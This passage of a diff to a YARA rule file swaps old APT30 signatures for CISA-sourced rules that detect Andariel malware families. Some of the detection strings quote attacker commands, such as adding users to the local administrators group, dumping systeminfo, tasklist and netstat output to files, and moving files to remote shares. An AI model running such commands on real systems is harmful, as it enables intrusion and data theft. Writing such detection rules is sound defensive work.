+		uint16( 0 ) == 0x5a4d and 1 of ( $handshake , $err_xor_str , $buf_add_cmp_1f ) and 1 of ( $hash_call_* ) or 2 of ( $handshake , $err_xor_str , $buf_add_cmp_1f )
 }
-rule SIGNATURE_BASE_APT30_Generic_B : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Atharvan_3RAT : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "df3b8896-7229-5b3b-ad2f-774b0cea167c"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L203-L222"
+		description = "Detects a variant of the Atharvan 3RAT malware family"
+		author = "CISA.gov"
+		id = "9ff6998a-a2dd-5671-bd3f-ee69561f71ef"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L127-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "527c823607836f138369224b7d8d492d36d9ab7a150e64fd5ebbaf99538d6d53"
-		score = 75
+		logic_hash = "741318234e245a35accc0b102a7891559ce5ef868ccdc3e6e4c8e59d8dea8b24"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0fcb4ffe2eb391421ec876286c9ddb6c"
-		hash2 = "29395c528693b69233c1c12bef8a64b3"
-		hash3 = "4c6b21e98ca03e0ef0910e07cef45dac"
-		hash4 = "550459b31d8dabaad1923565b7e50242"
-		hash5 = "65232a8d555d7c4f7bc0d7c5da08c593"
-		hash6 = "853a20f5fc6d16202828df132c41a061"
-		hash7 = "ed151602dea80f39173c2f7b1dd58e06"
 
 	strings:
-		$s2 = "Moziea/4.0" ascii
+		$3RAT = "D:\\rang\\TOOL\\3RAT"
+		$atharvan = "Atharvan_dll.pdb"
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule SIGNATURE_BASE_APT30_Generic_I : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Lilithrat_Variant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55046e1a-731a-5418-9a7a-4fe1611c77d0"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L224-L240"
+		description = "Detects a variant of the Lilith RAT malware family"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "916a289b-db7b-5f09-9d3e-589c3f09101d"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L143-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e6f0edcbf6e0590c8b4a558142053d5938e86d13d65787f02336dc2a173d5963"
-		score = 75
+		logic_hash = "3ce68908468ff85683b081842fa4faa579fbf6f7dc1a7fab5dcf7eac63d90aea"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe211c7a081c1dac46e3935f7c614549"
-		hash2 = "8c9db773d387bf9b3f2b6a532e4c937c"
 
 	strings:
-		$s0 = "Copyright 2012 Google Inc. All rights reserved." fullword wide
-		$s1 = "(Prxy%c-%s:%u)" fullword ascii
-		$s2 = "Google Inc." fullword wide
+		$lilith_1 = "Initiate a CMD session first." ascii
+		$lilith_2 = "CMD is not open" ascii
+		$lilith_3 = "Couldn't write command" ascii
+		$lilith_4 = "Couldn't write to CMD: CMD not open" ascii
+		$unique_1 = "Upload Error!" ascii
+		$unique_2 = "ERROR: Downloading is already running!" ascii
+		$unique_3 = "ERROR: Unable to open file:" ascii
+		$unique_4 = "General error" ascii
+		$unique_5 = "CMD error" ascii
+		$unique_6 = "killing self" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and ( all of ( $lilith_* ) or 4 of ( $unique_* ) or 1 of ( $lilith_4 , $unique_2 ) )
 }
-rule SIGNATURE_BASE_APT30_Sample_9 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Sockstroy_Strings_Opcodes : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bf24bb57-aff9-579c-b8a2-265a6d2a06d0"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L242-L263"
+		description = "Detects a variant of the SocksTroy malware family"
+		author = "CISA.gov"
+		id = "9e7fb6ba-771e-5cae-a0d5-c0b95ee6d4e9"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L180-L199"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "442bf8690401a2087a340ce4a48151c39101652f"
-		logic_hash = "0c5465bdafcbca02f855a0cba1fbb4c19d8d21b714dbe777b942dcd1a7acb257"
-		score = 75
+		logic_hash = "6ab31b285d0dba1745a2d8b172bd02931c6138e2b8e541203b88f111d179549b"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\Windo" ascii
-		$s2 = "oHHOSTR" ascii
-		$s3 = "Softwa]\\Mic" ascii
-		$s4 = "Startup'T" ascii
-		$s6 = "Ora\\%^" ascii
-		$s7 = "\\Ohttp=r" ascii
-		$s17 = "help32Snapshot0L" ascii
-		$s18 = "TimUmoveH" ascii
-		$s20 = "WideChc[lobalAl" ascii
+		$strHost = "-host" wide
+		$strAuth = "-auth" wide
+		$SocksTroy = "SocksTroy"
+		$cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $str* ) and all of ( $c* ) or all of ( $Socks* ) )
 }
-rule SIGNATURE_BASE_APT30_Sample_10 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Agni : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L264-L283"
+		description = "Detects samples of the Agni malware family"
+		author = "CISA.gov"
+		id = "ffe3f427-c10a-5ad4-ab29-c0d9b576c30f"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L201-L216"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "eb518cda3c4f4e6938aaaee07f1f7db8ee91c901"
-		logic_hash = "5a6bd8223fbce133bd11b903edfd7f8ff5a436e26a47c048a5ac606ad4a0b564"
-		score = 75
+		logic_hash = "302899b65e5a3a6beabbb46e80e3f0ff246c209206cc3a7f871011d68871d0b9"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
-		$s2 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
-		$s3 = "!! Use Connect Method !!" fullword ascii
-		$s4 = "(Prxy%c-%s:%u)" fullword ascii
-		$s5 = "msmsgs" fullword wide
-		$s18 = "(Prxy-No)" fullword ascii
+		$xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }
+		$stackstrings = { C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and #xor > 100 and #stackstrings > 5
 }
-rule SIGNATURE_BASE_APT30_Sample_11 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Handshake
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L285-L312"
+		description = "Detects a variant of the GoLang Validalpha malware"
+		author = "CISA.gov"
+		id = "51dafa43-9da0-569a-9123-7e9800284046"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L218-L230"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "59066d5d1ee3ad918111ed6fcaf8513537ff49a6"
-		logic_hash = "5e86b53591caa7c783a946205a3d04f91c71294d844e6f6ee88c3bc78e603ea0"
+		logic_hash = "1978210d07d3298c0051c9faca16685636e3fb45131b4c2fcb7053a0b3ef84d1"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
-		$s1 = "msofscan.exe" fullword wide
-		$s2 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
-		$s3 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
-		$s4 = "Windows XP Professional x64 Edition or Windows Server 2003" fullword ascii
-		$s9 = "NetEagle_Scout - " fullword ascii
-		$s10 = "Server 4.0, Enterprise Edition" fullword ascii
-		$s11 = "Windows 3.1(Win32s)" fullword ascii
-		$s12 = "%s%s%s %s" fullword ascii
-		$s13 = "Server 4.0" fullword ascii
-		$s15 = "Windows Millennium Edition" fullword ascii
-		$s16 = "msofscan" fullword wide
-		$s17 = "Eagle-Norton360-OfficeScan" fullword ascii
-		$s18 = "Workstation 4.0" fullword ascii
-		$s19 = "2003 Microsoft Office system" fullword wide
+		$ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_12 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Tasks
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L314-L329"
+		description = "Detects a variant of the GoLang Validalpha malware"
+		author = "CISA.gov"
+		id = "caa67a79-3ea6-5910-971c-f311722570ff"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L232-L247"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b02b5720ff0f73f01eb2ba029a58b645c987c4bc"
-		logic_hash = "997c91267f956bd7d2a7edca9817ebc80bbf1eed944b3bc01cc8bb01927deb1e"
-		score = 75
+		logic_hash = "0d3fb944888b289d345ffc8dfcc988abd04b8cabd1729a66e8236f95ee6147ee"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "Richic" fullword ascii
-		$s1 = "Accept: image/gif, */*" fullword ascii
-		$s2 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$ = "main.ScreenMonitThread"
+		$ = "main.CmdShell"
+		$ = "main.GetAllFoldersAndFiles"
+		$ = "main.SelfDelete"
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_13 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Golang_Validalpha_Blackstring : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L331-L349"
+		description = "Detects a variant of the GoLang Validalpha malware based on a file path found in the samples"
+		author = "CISA.gov"
+		id = "36f46a1d-69b6-5c99-9a54-6a14d62d2721"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L249-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a359f705a833c4a4254443b87645fd579aa94bcf"
-		logic_hash = "cd5285e8b78493b64704cec21c13d0a017d66936aa8356cfea2aa77c6f87b9e7"
-		score = 75
+		logic_hash = "07ea38890e99dd53437a23b7c4002851604b69a83bd7fb8971609226249e5954"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "msofscan.exe" fullword wide
-		$s1 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
-		$s2 = "Microsoft Office Word Plugin Scan" fullword wide
-		$s3 = "? 2006 Microsoft Corporation.  All rights reserved." fullword wide
-		$s4 = "msofscan" fullword wide
-		$s6 = "2003 Microsoft Office system" fullword wide
+		$ = "I:/01___Tools/02__RAT/Black"
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_14 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_ELF_Backdoor_Fipps : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L351-L367"
+		description = "Detects a Linux backdoor named Fipps used by Andariel"
+		author = "CISA.gov"
+		id = "040bca78-8b7e-5397-8a2b-1ddeed59eea3"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L291-L307"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b0740175d20eab79a5d62cdbe0ee1a89212a8472"
-		logic_hash = "e5f352b1aa643b9508c01bbe921197ebd8992ec94036b869c55970f0177164d3"
-		score = 75
+		logic_hash = "3b57eb6c6b89e93863b9600c4a1384f3e064f236e827ef9ffc37b1e5dcff7d24"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "AdobeReader.exe" fullword wide
-		$s4 = "10.1.7.27" fullword wide
-		$s5 = "Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All ri" wide
-		$s8 = "Adobe Reader" fullword wide
+		$a = "found mac address"
+		$b = "RecvThread"
+		$c = "OpenSSL-1.0.0-fipps"
+		$d = "Disconnected!"
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_15 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Bindshell : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L369-L387"
+		description = "Detects a BindShell used by Andariel"
+		author = "CISA.gov"
+		id = "3f6d83da-cea5-5e12-b0ba-93ace09d3d5c"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L309-L327"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7a8576804a2bbe4e5d05d1718f90b6a4332df027"
-		logic_hash = "5179f39bdcb064f55479ad147a019dd0b3874783c6bad650e84cfd9d0430bb70"
-		score = 75
+		logic_hash = "409aa6a27d81e14ea90d90ee02924cb11f5fecef592e6577b084f9ab2dde35fc"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\Windo" ascii
-		$s2 = "HHOSTR" ascii
-		$s3 = "Softwa]\\Mic" ascii
-		$s4 = "Startup'T" fullword ascii
-		$s17 = "help32Snapshot0L" fullword ascii
-		$s18 = "TimUmoveH" ascii
+		$str_comspec = "COMSPEC"
+		$str_consolewindow = "GetConsoleWindow"
+		$str_ShowWindow = "ShowWindow"
+		$str_WSASocketA = "WSASocketA"
+		$str_CreateProcessA = "CreateProcessA"
+		$str_port = { B9 4D 05 00 00 89 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_16 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Grease2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L389-L407"
+		description = "Detects the Grease2 malware family used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "4defbe08-b3c6-5ab9-9a57-cec57ff42d9a"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L329-L350"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "066d06ac08b48d3382d46bbeda6ad411b6d6130e"
-		logic_hash = "59ea90ac0590bd87a48fabf1a3fa7ece31560b980b738a34227937bbf82a1c55"
-		score = 75
-		quality = 60
+		logic_hash = "138fc915206e0c2834090ebc0a808913488121d51c17de3dbfadcb4099fbfa2f"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\Temp1020.txt" ascii
-		$s1 = "cmcbqyjs" fullword ascii
-		$s2 = "SPVSWh\\" fullword ascii
-		$s4 = "PSShxw@" fullword ascii
-		$s5 = "VWhHw@" fullword ascii
-		$s7 = "SVWhHw@" fullword ascii
+		$str_rdpconf = "emp\\RDPConf.exe"
+		$str_rdpwinst = "emp\\RDPWInst.exe"
+		$str_net_user = "net user"
+		$str_admins_add = "net localgroup administrators"
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT30_Generic_A : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Nopineapple_Dtrack_Unpacked : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6b851d94-d3bd-5c76-8fd0-adb42b3fab73"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L409-L429"
+		description = "Detects the Dtrack variant used by Andariel"
+		author = "CISA.gov"
+		id = "6ccaf24b-c110-5788-a792-fa7f39fb18f7"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L352-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c20660a8a55c6c6cb058fb233e0b29e1e4be2683181dbdfb06e17037d0ed8c31"
-		score = 75
+		logic_hash = "cf5f92a66ba3ff4db61102dcc50b781e8dd14ca7cb1eb70dae8eba2ed0910b66"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9f49aa1090fa478b9857e15695be4a89f8f3e594"
-		hash2 = "396116cfb51cee090822913942f6ccf81856c2fb"
-		hash3 = "fef9c3b4b35c226501f7d60816bb00331a904d5b"
-		hash4 = "7c9a13f1fdd6452fb6d62067f958bfc5fec1d24e"
-		hash5 = "5257ba027abe3a2cf397bfcae87b13ab9c1e9019"
 
 	strings:
-		$s5 = "WPVWhhiA" fullword ascii
-		$s6 = "VPWVhhiA" fullword ascii
-		$s11 = "VPhhiA" fullword ascii
-		$s12 = "uUhXiA" fullword ascii
+		$str_nopineapple = "< No Pineapple! >"
+		$str_qt_library = "Qt 5.12.10"
+		$str_xor = {8B 10 83 F6 ?? 83 FA 01 77}
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_17 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Dtrack_Unpacked : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L431-L445"
+		description = "Detects DTrack variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "0c161275-2b2e-51a4-9e08-c118fb4c8671"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L369-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c3aa52ff1d19e8fc6704777caf7c5bd120056845"
-		logic_hash = "43913151325fbce993dbfec0acf64ca835b12270c47156ae81b0ce4f32c7bde1"
+		logic_hash = "d8de583fc0de01e6784305d28dbf7cea859a24cf4df1dc59356601bc830e4770"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Nkfvtyvn}]ty}ztU" fullword ascii
-		$s4 = "IEXPL0RE" fullword ascii
+		$x_str_cmd_4 = "/c systeminfo > \"%s\" & tasklist > \"%s\" & netstat -naop tcp > \"%s\"" wide
+		$x_str_cmd_2 = "/c ping -n 3 127.0.01 > NUL % echo EEE > \"%s\"" wide
+		$str_mutex = "MTX_Global"
+		$str_cmd_1 = "/c net use \\\\" wide
+		$str_cmd_3 = "/c move /y %s \\\\" wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_18 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Tigerrat_Crowdsourced_Rule : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5dd6bc9-9383-5d48-92df-709996373655"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L446-L466"
+		description = "Detects the Tiger RAT variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "6be65222-7d3c-5ff5-a9c7-d91dcf1deaa6"
+		date = "2024-07-25"
+		modified = "2024-07-26"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L394-L423"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "355436a16d7a2eba8a284b63bb252a8bb1644751"
-		logic_hash = "d20f1d1b7b43defc36c7b1f99f14ed9e73e770b6f43d0ad92110cf9178b35b15"
+		logic_hash = "5d203d8c7e624796571f4597f70be0b8303f21c096640f25018cad29d4abc05b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "w.km-nyc.com" fullword ascii
-		$s1 = "tscv.exe" fullword ascii
-		$s2 = "Exit/app.htm" ascii
-		$s3 = "UBD:\\D" ascii
-		$s4 = "LastError" ascii
-		$s5 = "MicrosoftHaveAck" ascii
-		$s7 = "HHOSTR" ascii
